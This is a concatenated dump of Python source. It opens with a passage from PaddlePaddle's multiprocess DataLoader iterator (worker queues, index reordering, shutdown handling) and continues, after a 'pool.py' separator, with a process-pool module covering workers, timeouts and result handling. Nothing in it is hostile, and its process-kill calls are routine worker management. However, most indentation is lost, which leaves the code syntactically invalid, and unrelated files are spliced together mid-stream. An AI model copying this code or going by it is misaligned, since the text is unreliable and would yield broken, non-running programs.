# FIXME(dkp): _convert_to_tensor_list only support np.array
# list now, should support paddle.Tensor list
if isinstance(batch[0][0], paddle.Tensor):
np_batch = []
for sample in batch:
np_batch.append([s.numpy() for s in sample])
batch = np_batch
tensor_list = core._convert_to_tensor_list(batch)
out_queue.put((idx, tensor_list))
core._remove_tensor_list_mmap_fds(tensor_list)
else:
out_queue.put((idx, batch))
except KeyboardInterrupt:
# NOTE: Main process will raise KeyboardInterrupt anyways, ignore it in child process
pass
except:
six.reraise(*sys.exc_info())
finally:
if use_shared_memory:
_cleanup_mmap()
class _DataLoaderIterMultiProcess(_DataLoaderIterBase):
def __init__(self, loader):
super(_DataLoaderIterMultiProcess, self).__init__(loader)
assert self._num_workers > 0, "Multi-process DataLoader " \
"invalid num_workers({})".format(self._num_workers)
        # subprocess workers' result queue
self._data_queue = None
        # data fetched from _data_queue will be reordered by _rcvd_idx
        # to keep data order; data whose index does not equal _rcvd_idx
        # will be cached in _task_infos
self._send_idx = 0
self._rcvd_idx = 0
self._batches_outstanding = 0
self._task_infos = {}
        # _outstanding_capacity sets of indices are put out at first, and
        # the blocking_queue capacity is also _outstanding_capacity.
        # _outstanding_capacity is chosen so that each indices_queue
        # holds at least 2 sets of indices, and outstanding batches cache
        # output data for at least 2 iterations (note that len(_places)
        # batches are composed into one iteration output)
self._outstanding_capacity = 2 * max(self._num_workers,
len(self._places))
# see _try_put_indices
self._thread_lock = threading.Lock()
# init workers and indices queues and put 2 indices in each indices queue
self._init_workers()
for _ in range(self._outstanding_capacity):
self._try_put_indices()
self._init_thread()
self._shutdown = False
def _init_workers(self):
        # multiprocess workers and indices queue lists start out empty
self._workers = []
self._worker_status = []
self._indices_queues = []
self._workers_idx_cycle = itertools.cycle(range(self._num_workers))
# create data_queue for workers
self._data_queue = multiprocessing.Queue()
        # events for workers and the reader thread; the thread event is
        # only needed in multi-processing mode
self._workers_done_event = multiprocessing.Event()
self._thread_done_event = threading.Event()
for i in range(self._num_workers):
indices_queue = multiprocessing.Queue()
self._indices_queues.append(indices_queue)
worker = multiprocessing.Process(
target=_worker_loop,
args=(self._dataset, self._dataset_kind, indices_queue,
self._data_queue, self._workers_done_event,
self._collate_fn, self._worker_init_fn, i,
self._num_workers, self._use_shared_memory))
worker.daemon = True
worker.start()
self._workers.append(worker)
self._worker_status.append(True)
core._set_process_pids(id(self), tuple(w.pid for w in self._workers))
_set_SIGCHLD_handler()
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except:
self._data_queue.cancel_join_thread()
self._data_queue.close()
break
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
        # if there is only 1 place, there is no need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._outstanding_capacity, len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread_done_event = threading.Event()
self._thread = threading.Thread(target=self._thread_loop)
self._thread.daemon = True
self._thread.start()
def _shutdown_worker(self, worker_id):
if self._worker_status[worker_id]:
self._indices_queues[worker_id].put(None)
self._worker_status[worker_id] = False
def _try_shutdown_all(self):
if not self._shutdown:
try:
self._exit_thread_expectedly()
self._clear_and_remove_data_queue()
                # _workers_done_event should be set before putting None
                # into indices_queue; workers will exit on reading None from
                # indices_queue
self._workers_done_event.set()
for i in range(self._num_workers):
self._shutdown_worker(i)
for w in self._workers:
w.join()
for q in self._indices_queues:
q.cancel_join_thread()
q.close()
finally:
core._erase_process_pids(id(self))
self._shutdown = True
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _thread_loop(self):
while not self._thread_done_event.is_set():
batch = self._get_data()
if not self._thread_done_event.is_set():
if batch is None:
self._exit_thread_expectedly()
elif isinstance(batch, Exception):
self._exit_thread_unexpectedly()
else:
try:
# pack as LoDTensorArray
array = core.LoDTensorArray()
if self._use_shared_memory:
for tensor in batch:
array.append(tensor)
else:
                            # a LoDTensor that is not in shared memory is not
                            # serializable and cannot be created in workers
for slot in batch:
if not isinstance(slot, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
finally:
self._rcvd_idx += 1
def _get_data(self):
while not self._thread_done_event.is_set():
            # For IterableDataset, batch indices are generated infinitely
            # for each worker until it raises StopIteration, but a process
            # raising StopIteration discards a set of batch indices which is
            # counted in _send_idx but never increases _rcvd_idx, so we check
            # whether the worker is still alive here to skip the discarded
            # batch indices and increase _rcvd_idx
if self._dataset_kind == _DatasetKind.ITER:
while self._rcvd_idx < self._send_idx:
info = self._task_infos[self._rcvd_idx]
if len(info) == 2 or self._worker_status[info[0]]:
break
del self._task_infos[self._rcvd_idx]
self._rcvd_idx += 1
self._batches_outstanding -= 1
else:
                    # NOTE: _rcvd_idx and _send_idx only record batches among
                    # workers; even if the batches among workers are drained,
                    # there may still be data in the blocking queue
if self._batches_outstanding < len(self._places):
return None
continue
if self._rcvd_idx in self._task_infos and \
len(self._task_infos[self._rcvd_idx]) == 2:
return self._task_infos.pop(self._rcvd_idx)[1]
try:
                # [ avoid hang ]: the main process may block at _reader.read_next on
                # KeyboardInterrupt, so we make the following tradeoff:
                # 1. get data with a timeout, MP_INDICES_CHECK_INTERVAL (5s) by
                #    default; if KeyboardInterrupt is blocking, failed workers are
                #    checked and a RuntimeError is raised to quit DataLoader in the
                #    timeout exception handling.
                # 2. if getting data times out and all workers are still alive,
                #    continue to get data again
data = self._data_queue.get(timeout=self._timeout)
except Exception as e:
# check if thread done event set when waiting data
if self._thread_done_event.is_set():
continue
# check failed workers
failed_workers = []
for i, w in enumerate(self._workers):
if self._worker_status[i] and not w.is_alive():
failed_workers.append(w)
self._shutdown_worker(i)
if len(failed_workers) > 0:
self._exit_thread_unexpectedly()
pids = ', '.join(str(w.pid) for w in failed_workers)
raise RuntimeError("DataLoader {} workers exit unexpectedly, " \
"pids: {}".format(len(failed_workers), pids))
# get(timeout) will call _poll(timeout) and may raise IOError
if isinstance(e, queue.Empty) or isinstance(e, IOError):
# continue on timeout to keep getting data from queue
continue
self._exit_thread_unexpectedly()
logging.error("DataLoader reader thread failed({}) to read data from " \
"workers' result queue.".format(e))
six.reraise(*sys.exc_info())
else:
if self._dataset_kind == _DatasetKind.ITER and isinstance(
data, _IterableDatasetStopIteration):
                    # if a worker gets StopIteration, we shut down this worker;
                    # note that the batch indices that triggered StopIteration
                    # are discarded, so the outstanding batch number should be
                    # decreased and another set of indices should be put, since
                    # other workers may still be working.
self._shutdown_worker(data.worker_id)
self._batches_outstanding -= 1
self._try_put_indices()
continue
idx, batch = data
if idx == self._rcvd_idx:
del self._task_infos[idx]
return batch
else:
self._task_infos[idx] += (batch, )
continue
def _try_put_indices(self):
assert self._batches_outstanding <= self._outstanding_capacity, \
"too many indices have been put to queue"
        # In multi-process mode for IterableDataset, _try_put_indices will
        # be called both in the main process (our implementation has a blocking
        # queue, and the blocking queue is read in the main process) and in the
        # reader thread, which may cause the following errors:
        # 1. "ValueError: generator already executing" in next(self._sampler_iter)
        # 2. re-entrant increase of _send_idx
        # We add a lock for thread safety; since _try_put_indices is only a
        # lightweight function that is not in the data reading pipeline, this
        # lock has almost no influence on performance
with self._thread_lock:
try:
indices = next(self._sampler_iter)
except StopIteration:
return
for i in range(self._num_workers):
worker_idx = next(self._workers_idx_cycle)
if self._worker_status[worker_idx]:
break
else:
return
self._indices_queues[worker_idx].put((self._send_idx, indices))
self._task_infos[self._send_idx] = (worker_idx, )
self._batches_outstanding += 1
self._send_idx += 1
def __del__(self):
self._try_shutdown_all()
def __next__(self):
try:
            # _batches_outstanding here records the total number of batches
            # between _try_put_indices and the output of data; this value
            # should be _outstanding_capacity if data is not drained. If
            # _batches_outstanding is less than the number of _places, there
            # is not enough data to generate the next output, so close
            # blocking_queue and set _thread_done_event here; py_reader will
            # raise StopIteration, ending workers and indices_queues in the
            # StopIteration handling
if self._batches_outstanding < len(self._places):
self._thread_done_event.set()
self._blocking_queue.close()
if in_dygraph_mode():
data = self._reader.read_next_var_list()
else:
if self._return_list:
data = self._reader.read_next_list()
                    # static graph organizes multi-device data as a list; if the
                    # place number is 1 there is only 1 device, so extract the data
                    # from the device list to be compatible with dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
self._on_output_batch()
return data
except StopIteration:
self._reader.reset()
self._try_shutdown_all()
six.reraise(*sys.exc_info())
# python2 compatibility
def next(self):
return self.__next__()
def _on_output_batch(self):
for _ in range(len(self._places)):
self._batches_outstanding -= 1
self._try_put_indices()
|
pool.py
|
# -*- coding: utf-8 -*-
#
# Module providing the `Pool` class for managing a process pool
#
# multiprocessing/pool.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
#
# Imports
#
import errno
import itertools
import os
import platform
import signal
import sys
import threading
import time
import warnings
from collections import deque
from functools import partial
from . import cpu_count, get_context
from . import util
from .common import pickle_loads, reset_signals, restart_state
from .compat import get_errno, send_offset
from .einfo import ExceptionInfo
from .dummy import DummyProcess
from .exceptions import (
CoroStop,
RestartFreqExceeded,
SoftTimeLimitExceeded,
Terminated,
TimeLimitExceeded,
TimeoutError,
WorkerLostError,
)
from .five import Empty, Queue, range, values, reraise, monotonic
from .util import Finalize, debug
PY3 = sys.version_info[0] == 3
if platform.system() == 'Windows': # pragma: no cover
# On Windows os.kill calls TerminateProcess which cannot be
    # handled by any process, so this is needed to terminate the task
# *and its children* (if any).
from ._win import kill_processtree as _kill # noqa
SIGKILL = signal.SIGTERM
else:
from os import kill as _kill # noqa
SIGKILL = signal.SIGKILL
try:
TIMEOUT_MAX = threading.TIMEOUT_MAX
except AttributeError: # pragma: no cover
TIMEOUT_MAX = 1e10 # noqa
if sys.version_info >= (3, 3):
_Semaphore = threading.Semaphore
else:
# Semaphore is a factory function pointing to _Semaphore
_Semaphore = threading._Semaphore # noqa
SIGMAP = dict(
(getattr(signal, n), n) for n in dir(signal) if n.startswith('SIG')
)
#
# Constants representing the state of a pool
#
RUN = 0
CLOSE = 1
TERMINATE = 2
#
# Constants representing the state of a job
#
ACK = 0
READY = 1
TASK = 2
NACK = 3
DEATH = 4
#
# Exit code constants
#
EX_OK = 0
EX_FAILURE = 1
EX_RECYCLE = 0x9B
# Signal used for soft time limits.
SIG_SOFT_TIMEOUT = getattr(signal, "SIGUSR1", None)
#
# Miscellaneous
#
LOST_WORKER_TIMEOUT = 10.0
EX_OK = getattr(os, "EX_OK", 0)
job_counter = itertools.count()
Lock = threading.Lock
def _get_send_offset(connection):
try:
native = connection.send_offset
except AttributeError:
native = None
if native is None:
return partial(send_offset, connection.fileno())
return native
def human_status(status):
if (status or 0) < 0:
try:
return 'signal {0} ({1})'.format(-status, SIGMAP[-status])
except KeyError:
return 'signal {0}'.format(-status)
return 'exitcode {0}'.format(status)
def mapstar(args):
return list(map(*args))
def starmapstar(args):
return list(itertools.starmap(args[0], args[1]))
def error(msg, *args, **kwargs):
if util._logger:
util._logger.error(msg, *args, **kwargs)
def stop_if_not_current(thread, timeout=None):
if thread is not threading.current_thread():
thread.stop(timeout)
class LaxBoundedSemaphore(_Semaphore):
    """Semaphore that allows release() to be called more times than
    acquire(): extra releases beyond the initial value are silently ignored."""
def __init__(self, value=1, verbose=None):
if PY3:
_Semaphore.__init__(self, value)
else:
_Semaphore.__init__(self, value, verbose)
self._initial_value = value
    def grow(self):
        if PY3:
            cond = self._cond
        else:
            cond = self._Semaphore__cond
        with cond:
            self._initial_value += 1
            if PY3:
                self._value += 1
            else:
                self._Semaphore__value += 1
            cond.notify()
def shrink(self):
self._initial_value -= 1
self.acquire()
if PY3:
def release(self):
cond = self._cond
with cond:
if self._value < self._initial_value:
self._value += 1
cond.notify_all()
def clear(self):
while self._value < self._initial_value:
_Semaphore.release(self)
else:
def release(self): # noqa
cond = self._Semaphore__cond
with cond:
if self._Semaphore__value < self._initial_value:
self._Semaphore__value += 1
cond.notifyAll()
def clear(self): # noqa
while self._Semaphore__value < self._initial_value:
_Semaphore.release(self)
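# Illustration only (not used by the pool machinery): unlike
# threading.BoundedSemaphore, LaxBoundedSemaphore silently ignores release()
# calls beyond its initial value instead of raising.
def _lax_semaphore_example():
    sem = LaxBoundedSemaphore(1)
    sem.acquire()   # value drops to 0
    sem.release()   # value restored to 1
    sem.release()   # extra release is ignored; value stays at 1
    return sem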
#
# Exceptions
#
class MaybeEncodingError(Exception):
"""Wraps possible unpickleable errors, so they can be
safely sent through the socket."""
def __init__(self, exc, value):
self.exc = repr(exc)
self.value = repr(value)
super(MaybeEncodingError, self).__init__(self.exc, self.value)
def __repr__(self):
return "<MaybeEncodingError: %s>" % str(self)
def __str__(self):
return "Error sending result: '%r'. Reason: '%r'." % (
self.value, self.exc)
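# Illustration only: MaybeEncodingError is constructed when pickling or
# sending a task result fails, wrapping the original error and the offending
# value so the failure itself can still be reported over the result queue.
# The lambda below is just an example of an unpicklable value.
def _maybe_encoding_error_example():
    import pickle
    unpicklable = lambda: None
    try:
        pickle.dumps(unpicklable)
    except Exception as exc:
        return MaybeEncodingError(exc, unpicklable)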
class WorkersJoined(Exception):
"""All workers have terminated."""
def soft_timeout_sighandler(signum, frame):
raise SoftTimeLimitExceeded()
#
# Code run by worker processes
#
class Worker(object):
_controlled_termination = False
_job_terminated = False
def __init__(self, inq, outq, synq=None, initializer=None, initargs=(),
maxtasks=None, sentinel=None, on_exit=None,
sigprotection=True, wrap_exception=True, max_memory_per_child=None):
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
self.initializer = initializer
self.initargs = initargs
self.maxtasks = maxtasks
self.max_memory_per_child = max_memory_per_child
self._shutdown = sentinel
self.on_exit = on_exit
self.sigprotection = sigprotection
self.inq, self.outq, self.synq = inq, outq, synq
self.wrap_exception = wrap_exception # XXX cannot disable yet
self.contribute_to_object(self)
def contribute_to_object(self, obj):
obj.inq, obj.outq, obj.synq = self.inq, self.outq, self.synq
obj.inqW_fd = self.inq._writer.fileno() # inqueue write fd
obj.outqR_fd = self.outq._reader.fileno() # outqueue read fd
if self.synq:
obj.synqR_fd = self.synq._reader.fileno() # synqueue read fd
obj.synqW_fd = self.synq._writer.fileno() # synqueue write fd
obj.send_syn_offset = _get_send_offset(self.synq._writer)
else:
obj.synqR_fd = obj.synqW_fd = obj._send_syn_offset = None
obj._quick_put = self.inq._writer.send
obj._quick_get = self.outq._reader.recv
obj.send_job_offset = _get_send_offset(self.inq._writer)
return obj
def __reduce__(self):
return self.__class__, (
self.inq, self.outq, self.synq, self.initializer,
self.initargs, self.maxtasks, self._shutdown, self.on_exit,
self.sigprotection, self.wrap_exception,
)
def __call__(self):
_exit = sys.exit
_exitcode = [None]
def exit(status=None):
_exitcode[0] = status
return _exit()
sys.exit = exit
pid = os.getpid()
self._make_child_methods()
self.after_fork()
self.on_loop_start(pid=pid) # callback on loop start
try:
sys.exit(self.workloop(pid=pid))
except Exception as exc:
error('Pool process %r error: %r', self, exc, exc_info=1)
self._do_exit(pid, _exitcode[0], exc)
finally:
self._do_exit(pid, _exitcode[0], None)
def _do_exit(self, pid, exitcode, exc=None):
if exitcode is None:
exitcode = EX_FAILURE if exc else EX_OK
if self.on_exit is not None:
self.on_exit(pid, exitcode)
if sys.platform != 'win32':
try:
self.outq.put((DEATH, (pid, exitcode)))
time.sleep(1)
finally:
os._exit(exitcode)
else:
os._exit(exitcode)
def on_loop_start(self, pid):
pass
def terminate_controlled(self):
self._controlled_termination = True
self.terminate()
def prepare_result(self, result):
return result
def workloop(self, debug=debug, now=monotonic, pid=None):
pid = pid or os.getpid()
put = self.outq.put
inqW_fd = self.inqW_fd
synqW_fd = self.synqW_fd
maxtasks = self.maxtasks
max_memory_per_child = self.max_memory_per_child
prepare_result = self.prepare_result
wait_for_job = self.wait_for_job
_wait_for_syn = self.wait_for_syn
def wait_for_syn(jid):
i = 0
while 1:
if i > 60:
error('!!!WAIT FOR ACK TIMEOUT: job:%r fd:%r!!!',
jid, self.synq._reader.fileno(), exc_info=1)
req = _wait_for_syn()
if req:
type_, args = req
if type_ == NACK:
return False
assert type_ == ACK
return True
i += 1
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
req = wait_for_job()
if req:
type_, args_ = req
assert type_ == TASK
job, i, fun, args, kwargs = args_
put((ACK, (job, i, now(), pid, synqW_fd)))
if _wait_for_syn:
confirm = wait_for_syn(job)
if not confirm:
continue # received NACK
try:
result = (True, prepare_result(fun(*args, **kwargs)))
except Exception:
result = (False, ExceptionInfo())
try:
put((READY, (job, i, result, inqW_fd)))
except Exception as exc:
_, _, tb = sys.exc_info()
try:
wrapped = MaybeEncodingError(exc, result[1])
einfo = ExceptionInfo((
MaybeEncodingError, wrapped, tb,
))
put((READY, (job, i, (False, einfo), inqW_fd)))
finally:
del(tb)
completed += 1
                if max_memory_per_child and max_memory_per_child > 0:
import resource
used_kb = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
if used_kb > 0:
if used_kb > max_memory_per_child:
error('child process exiting because it exceeded its maximum memory setting of %d KiB with %d KiB', max_memory_per_child, used_kb)
return EX_RECYCLE
else:
error('worker unable to determine worker memory usage')
debug('worker exiting after %d tasks', completed)
if maxtasks:
return EX_RECYCLE if completed == maxtasks else EX_FAILURE
return EX_OK
def after_fork(self):
if hasattr(self.inq, '_writer'):
self.inq._writer.close()
if hasattr(self.outq, '_reader'):
self.outq._reader.close()
if self.initializer is not None:
self.initializer(*self.initargs)
# Make sure all exiting signals call finally: blocks.
# This is important for the semaphore to be released.
reset_signals(full=self.sigprotection)
# install signal handler for soft timeouts.
if SIG_SOFT_TIMEOUT is not None:
signal.signal(SIG_SOFT_TIMEOUT, soft_timeout_sighandler)
try:
signal.signal(signal.SIGINT, signal.SIG_IGN)
except AttributeError:
pass
def _make_recv_method(self, conn):
get = conn.get
if hasattr(conn, '_reader'):
_poll = conn._reader.poll
if hasattr(conn, 'get_payload') and conn.get_payload:
get_payload = conn.get_payload
def _recv(timeout, loads=pickle_loads):
return True, loads(get_payload())
else:
def _recv(timeout): # noqa
if _poll(timeout):
return True, get()
return False, None
else:
def _recv(timeout): # noqa
try:
return True, get(timeout=timeout)
except Queue.Empty:
return False, None
return _recv
def _make_child_methods(self, loads=pickle_loads):
self.wait_for_job = self._make_protected_receive(self.inq)
self.wait_for_syn = (self._make_protected_receive(self.synq)
if self.synq else None)
def _make_protected_receive(self, conn):
_receive = self._make_recv_method(conn)
should_shutdown = self._shutdown.is_set if self._shutdown else None
def receive(debug=debug):
if should_shutdown and should_shutdown():
debug('worker got sentinel -- exiting')
raise SystemExit(EX_OK)
try:
ready, req = _receive(1.0)
if not ready:
return None
except (EOFError, IOError) as exc:
if get_errno(exc) == errno.EINTR:
return None # interrupted, maybe by gdb
debug('worker got %s -- exiting', type(exc).__name__)
raise SystemExit(EX_FAILURE)
if req is None:
debug('worker got sentinel -- exiting')
raise SystemExit(EX_FAILURE)
return req
return receive
#
# Class representing a process pool
#
class PoolThread(DummyProcess):
def __init__(self, *args, **kwargs):
DummyProcess.__init__(self)
self._state = RUN
self._was_started = False
self.daemon = True
def run(self):
try:
return self.body()
except RestartFreqExceeded as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
_kill(os.getpid(), signal.SIGTERM)
sys.exit()
except Exception as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
os._exit(1)
def start(self, *args, **kwargs):
self._was_started = True
super(PoolThread, self).start(*args, **kwargs)
def on_stop_not_started(self):
pass
def stop(self, timeout=None):
if self._was_started:
self.join(timeout)
return
self.on_stop_not_started()
def terminate(self):
self._state = TERMINATE
def close(self):
self._state = CLOSE
class Supervisor(PoolThread):
def __init__(self, pool):
self.pool = pool
super(Supervisor, self).__init__()
def body(self):
debug('worker handler starting')
time.sleep(0.8)
pool = self.pool
try:
# do a burst at startup to verify that we can start
# our pool processes, and in that time we lower
# the max restart frequency.
prev_state = pool.restart_state
pool.restart_state = restart_state(10 * pool._processes, 1)
for _ in range(10):
if self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.1)
            # Keep maintaining workers until the cache gets drained, unless
            # the pool is terminated.
pool.restart_state = prev_state
while self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.8)
except RestartFreqExceeded:
pool.close()
pool.join()
raise
debug('worker handler exiting')
class TaskHandler(PoolThread):
def __init__(self, taskqueue, put, outqueue, pool):
self.taskqueue = taskqueue
self.put = put
self.outqueue = outqueue
self.pool = pool
super(TaskHandler, self).__init__()
def body(self):
taskqueue = self.taskqueue
put = self.put
for taskseq, set_length in iter(taskqueue.get, None):
try:
i = -1
for i, task in enumerate(taskseq):
if self._state:
debug('task handler found thread._state != RUN')
break
try:
put(task)
except IOError:
debug('could not put task on queue')
break
else:
if set_length:
debug('doing set_length()')
set_length(i + 1)
continue
break
except Exception as exc:
error('Task Handler ERROR: %r', exc, exc_info=1)
break
else:
debug('task handler got sentinel')
self.tell_others()
def tell_others(self):
outqueue = self.outqueue
put = self.put
pool = self.pool
try:
# tell result handler to finish when cache is empty
debug('task handler sending sentinel to result handler')
outqueue.put(None)
# tell workers there is no more work
debug('task handler sending sentinel to workers')
for p in pool:
put(None)
except IOError:
debug('task handler got IOError when sending sentinels')
debug('task handler exiting')
def on_stop_not_started(self):
self.tell_others()
class TimeoutHandler(PoolThread):
def __init__(self, processes, cache, t_soft, t_hard):
self.processes = processes
self.cache = cache
self.t_soft = t_soft
self.t_hard = t_hard
self._it = None
super(TimeoutHandler, self).__init__()
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self.processes)
if proc.pid == pid
), (None, None))
def on_soft_timeout(self, job):
debug('soft time limit exceeded for %r', job)
process, _index = self._process_by_pid(job._worker_pid)
if not process:
return
# Run timeout callback
job.handle_timeout(soft=True)
try:
_kill(job._worker_pid, SIG_SOFT_TIMEOUT)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
def on_hard_timeout(self, job):
if job.ready():
return
debug('hard time limit exceeded for %r', job)
# Remove from cache and set return value to an exception
try:
raise TimeLimitExceeded(job._timeout)
except TimeLimitExceeded:
job._set(job._job, (False, ExceptionInfo()))
else: # pragma: no cover
pass
# Remove from _pool
process, _index = self._process_by_pid(job._worker_pid)
# Run timeout callback
job.handle_timeout(soft=False)
if process:
self._trywaitkill(process)
def _trywaitkill(self, worker):
debug('timeout: sending TERM to %s', worker._name)
try:
worker.terminate()
except OSError:
pass
else:
if worker._popen.wait(timeout=0.1):
return
debug('timeout: TERM timed-out, now sending KILL to %s', worker._name)
try:
_kill(worker.pid, SIGKILL)
except OSError:
pass
def handle_timeouts(self):
cache = self.cache
t_hard, t_soft = self.t_hard, self.t_soft
dirty = set()
on_soft_timeout = self.on_soft_timeout
on_hard_timeout = self.on_hard_timeout
def _timed_out(start, timeout):
if not start or not timeout:
return False
if monotonic() >= start + timeout:
return True
# Inner-loop
while self._state == RUN:
# Remove dirty items not in cache anymore
if dirty:
dirty = set(k for k in dirty if k in cache)
for i, job in list(cache.items()):
ack_time = job._time_accepted
soft_timeout = job._soft_timeout
if soft_timeout is None:
soft_timeout = t_soft
hard_timeout = job._timeout
if hard_timeout is None:
hard_timeout = t_hard
if _timed_out(ack_time, hard_timeout):
on_hard_timeout(job)
elif i not in dirty and _timed_out(ack_time, soft_timeout):
on_soft_timeout(job)
dirty.add(i)
yield
def body(self):
while self._state == RUN:
try:
for _ in self.handle_timeouts():
time.sleep(1.0) # don't spin
except CoroStop:
break
debug('timeout handler exiting')
def handle_event(self, *args):
if self._it is None:
self._it = self.handle_timeouts()
try:
next(self._it)
except StopIteration:
self._it = None
class ResultHandler(PoolThread):
def __init__(self, outqueue, get, cache, poll,
join_exited_workers, putlock, restart_state,
check_timeouts, on_job_ready):
self.outqueue = outqueue
self.get = get
self.cache = cache
self.poll = poll
self.join_exited_workers = join_exited_workers
self.putlock = putlock
self.restart_state = restart_state
self._it = None
self._shutdown_complete = False
self.check_timeouts = check_timeouts
self.on_job_ready = on_job_ready
self._make_methods()
super(ResultHandler, self).__init__()
def on_stop_not_started(self):
# used when pool started without result handler thread.
self.finish_at_shutdown(handle_timeouts=True)
def _make_methods(self):
cache = self.cache
putlock = self.putlock
restart_state = self.restart_state
on_job_ready = self.on_job_ready
def on_ack(job, i, time_accepted, pid, synqW_fd):
restart_state.R = 0
try:
cache[job]._ack(i, time_accepted, pid, synqW_fd)
except (KeyError, AttributeError):
# Object gone or doesn't support _ack (e.g. IMAPIterator).
pass
def on_ready(job, i, obj, inqW_fd):
if on_job_ready is not None:
on_job_ready(job, i, obj, inqW_fd)
try:
item = cache[job]
except KeyError:
return
if not item.ready():
if putlock is not None:
putlock.release()
try:
item._set(i, obj)
except KeyError:
pass
def on_death(pid, exitcode):
try:
os.kill(pid, signal.SIGTERM)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
state_handlers = self.state_handlers = {
ACK: on_ack, READY: on_ready, DEATH: on_death
}
def on_state_change(task):
state, args = task
try:
state_handlers[state](*args)
except KeyError:
debug("Unknown job state: %s (args=%s)", state, args)
self.on_state_change = on_state_change
def _process_result(self, timeout=1.0):
poll = self.poll
on_state_change = self.on_state_change
while 1:
try:
ready, task = poll(timeout)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
raise CoroStop()
if self._state:
assert self._state == TERMINATE
debug('result handler found thread._state=TERMINATE')
raise CoroStop()
if ready:
if task is None:
debug('result handler got sentinel')
raise CoroStop()
on_state_change(task)
if timeout != 0: # blocking
break
else:
break
yield
def handle_event(self, fileno=None, events=None):
if self._state == RUN:
if self._it is None:
self._it = self._process_result(0) # non-blocking
try:
next(self._it)
except (StopIteration, CoroStop):
self._it = None
def body(self):
debug('result handler starting')
try:
while self._state == RUN:
try:
for _ in self._process_result(1.0): # blocking
pass
except CoroStop:
break
finally:
self.finish_at_shutdown()
def finish_at_shutdown(self, handle_timeouts=False):
self._shutdown_complete = True
get = self.get
outqueue = self.outqueue
cache = self.cache
poll = self.poll
join_exited_workers = self.join_exited_workers
check_timeouts = self.check_timeouts
on_state_change = self.on_state_change
time_terminate = None
while cache and self._state != TERMINATE:
if check_timeouts is not None:
check_timeouts()
try:
ready, task = poll(1.0)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
return
if ready:
if task is None:
debug('result handler ignoring extra sentinel')
continue
on_state_change(task)
try:
join_exited_workers(shutdown=True)
except WorkersJoined:
now = monotonic()
if not time_terminate:
time_terminate = now
else:
if now - time_terminate > 5.0:
debug('result handler exiting: timed out')
break
debug('result handler: all workers terminated, '
'timeout in %ss',
abs(min(now - time_terminate - 5.0, 0)))
if hasattr(outqueue, '_reader'):
debug('ensuring that outqueue is not full')
# If we don't make room available in outqueue then
# attempts to add the sentinel (None) to outqueue may
# block. There is guaranteed to be no more than 2 sentinels.
try:
for i in range(10):
if not outqueue._reader.poll():
break
get()
except (IOError, EOFError):
pass
debug('result handler exiting: len(cache)=%s, thread._state=%s',
len(cache), self._state)
class Pool(object):
'''
Class which supports an async version of applying functions to arguments.
'''
_wrap_exception = True
Worker = Worker
Supervisor = Supervisor
TaskHandler = TaskHandler
TimeoutHandler = TimeoutHandler
ResultHandler = ResultHandler
SoftTimeLimitExceeded = SoftTimeLimitExceeded
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, timeout=None, soft_timeout=None,
lost_worker_timeout=None,
max_restarts=None, max_restart_freq=1,
on_process_up=None,
on_process_down=None,
on_timeout_set=None,
on_timeout_cancel=None,
threads=True,
semaphore=None,
putlocks=False,
allow_restart=False,
synack=False,
on_process_exit=None,
context=None,
max_memory_per_child=None,
**kwargs):
self._ctx = context or get_context()
self.synack = synack
self._setup_queues()
self._taskqueue = Queue()
self._cache = {}
self._state = RUN
self.timeout = timeout
self.soft_timeout = soft_timeout
self._maxtasksperchild = maxtasksperchild
self._max_memory_per_child = max_memory_per_child
self._initializer = initializer
self._initargs = initargs
self._on_process_exit = on_process_exit
self.lost_worker_timeout = lost_worker_timeout or LOST_WORKER_TIMEOUT
self.on_process_up = on_process_up
self.on_process_down = on_process_down
self.on_timeout_set = on_timeout_set
self.on_timeout_cancel = on_timeout_cancel
self.threads = threads
self.readers = {}
self.allow_restart = allow_restart
if soft_timeout and SIG_SOFT_TIMEOUT is None:
            warnings.warn(UserWarning(
                "Soft timeouts are not supported "
                "on this platform: it does not have the SIGUSR1 signal.",
            ))
soft_timeout = None
self._processes = self.cpu_count() if processes is None else processes
self.max_restarts = max_restarts or round(self._processes * 100)
self.restart_state = restart_state(max_restarts, max_restart_freq or 1)
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
if on_process_exit is not None and not callable(on_process_exit):
raise TypeError('on_process_exit must be callable')
self._pool = []
self._poolctrl = {}
self.putlocks = putlocks
self._putlock = semaphore or LaxBoundedSemaphore(self._processes)
for i in range(self._processes):
self._create_worker_process(i)
self._worker_handler = self.Supervisor(self)
if threads:
self._worker_handler.start()
self._task_handler = self.TaskHandler(self._taskqueue,
self._quick_put,
self._outqueue,
self._pool)
if threads:
self._task_handler.start()
